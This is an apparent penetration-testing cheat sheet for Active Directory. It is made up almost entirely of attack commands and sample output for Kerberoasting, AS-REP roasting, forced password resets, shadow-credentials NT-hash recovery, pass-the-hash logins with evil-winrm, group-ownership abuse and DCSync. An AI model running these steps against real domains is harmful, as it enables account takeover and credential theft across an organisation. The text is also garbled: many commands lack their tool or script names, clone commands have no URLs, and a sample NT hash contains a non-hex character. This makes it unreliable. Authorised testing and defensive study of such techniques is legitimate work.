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Active Directory Penetration Testing using Linux



#Get TGS Ticket Using
sudo -request -dc-ip Steins.local/mark 
Find Pre-Auth Disabled Users DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip
Running Bloodhound on Linux 

#Match the Time with Doamin controller. 
sudo apt-get install ntpdate
sudo ntpdate <DC IP>

#Add required DNS to /etc/hosts if there is no direct DNS 

#Once you have creds for any user -run blood hound to look for priv esc
git clone
pip install
bloodhound-python -u UserName -p "P@SSW)RD!" -d steins.local -ns -c All
Abusing GenericAll or ForceChangePassword or Password Reset

git clone

#User1 has GenericAll Permisions on User2
#Change password for User2
python -u "User1" -p "Password1" -d "domain.local" --host "" set password "User2" "12345678"

Abusing GenericWrite 

targetedKerberoast is a Python script that can, like many others (e.g., print "kerberoast" hashes for user accounts that have a SPN set. 
for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), 
print the "kerberoast" hash and delete the temporary SPN set for that operation. This is called targeted Kerberoasting

git clone
python -m pip install -r requirements.txt -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword' --dc-ip

#Crack the hash 
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force

####### IF you are unable to crack KRBTGT HASH ########
# Next Option is to Get NT hash - then pass the hash to login
#Shadow Credentials attack - it generates a cert, use that cert to get TGT
#Then use TGT to get NT Hash 

git clone
python -m pip install -r requirements.txt
sudo python install 

# Install pywhisker
pywhisker -d "DOMAIN.Local" -u "ControlledUser" -p "P@SSw0rd!" --target "victim_user" --action "add"
[+] Saved PFX (#PKCS12) certificate & key at path: XNGPSfJF.pfx
[*] Must be used with password: Tg8nymEvBWvLLsJoGmXA
[*] A TGT can now be obtained with

# Install PKINITtools
git clone
pip3 install impacket minikerberos

#incase of libcrypto errors 
pip3 install -I git+

# Obtain a TGT 
# Use the -cert-pfx & -pfx-pass from pywhisker
python ./ -cert-pfx ./XNGPSfJF.pfx -pfx-pass Tg8nymEvBWvLLsJoGmXA DOMAIN.Local/victim_user TGT.ccache
[*] INFO:minikerberos:0eea2afda8e666301911b3cd28f5b0004f59fb9ee71b04ba2bd507354e7d6691
[*] INFO:minikerberos:Saved TGT to file

#Save the TGT.ccache file to PATH 
export KRB5CCNAME=/home/user/TGT.ccache

#Get NT Hash 
#Use the key from 
python -key 0eea2afda8e666301911b3cd28f5b0004f59fb9ee71b04ba2bd507354e7d6691 DOMAIN.Local/victim_user
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[+] Recovered NT Hash b121d1522bddd4578c97g5a6a1158891

#use evil-winrm to login
evil-winrm  -i -u victim_user -H b121d1522bddd4578c97g5a6a1158891

Abusing WriteOwner on a Group 

Example Scenario: `USER1` has write owner permissions on `dev_group@DOMAIN.LOCAL` and it  has `dev_user` user

#change the ownership of the object -action write -new-owner 'USER1' -target 'dev_group' 'DOMAIN.LOCAL'/'USER1':'P@ssw0rd!'

#To abuse ownership of a group object, you may grant yourself the AddMember privilege -action 'write' -rights 'WriteMembers' -principal 'USER1' -target-dn 'CN=dev_group,CN=USERS,DC=DOMAIN,DC=LOCAL' 'DOMAIN.LOCAL'/'USER1':'P@ssw0rd!'

# Add yourself/user to the group 
net rpc group addmem "dev_group" "USER1" -U 'DOMAIN.LOCAL'/'USER1'%'P@ssw0rd!' -S "dc01.DOMAIN.LOCAL"

#Check if the user is added successfully 
net rpc group members "dev_group" -U 'DOMAIN.LOCAL'/'USER1'%'P@ssw0rd!' -S "dc01.DOMAIN.LOCAL"
Abusing WriteOwner Permission on User

#ControllerUser has WriteOwner permissions on  Victim_User -action write -new-owner 'ControllerUser' -target 'Victim_User' 'DOMAIN.Local'/'ControllerUser':'Controlled_Passwd'

# Set full control of Victim_User to ControllerUser -action 'write' -rights 'FullControl' -principal 'ControllerUser' -target 'Victim_User' 'DOMAIN.Local'/'ControllerUser':'Controlled_Passwd'

#install Certipy
pip3 install certipy-ad

#Certipy’s `shadow auto` command to retrieve the NT hash of the victim.
certipy shadow auto -u 'ControllerUser@DOMAIN.Local' -p "Controlled_Passwd" -account 'Victim_User' -dc-ip ''
[*] Successfully restored the old Key Credentials for 'Victim_User'
[*] NT hash for 'Victim_User': b121d1522bddd4578c97g5a6a1158891

#use evil-winrm to login
evil-winrm  -i -u victim_user -H b121d1522bddd4578c97g5a6a1158891

DCSync Attack 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'


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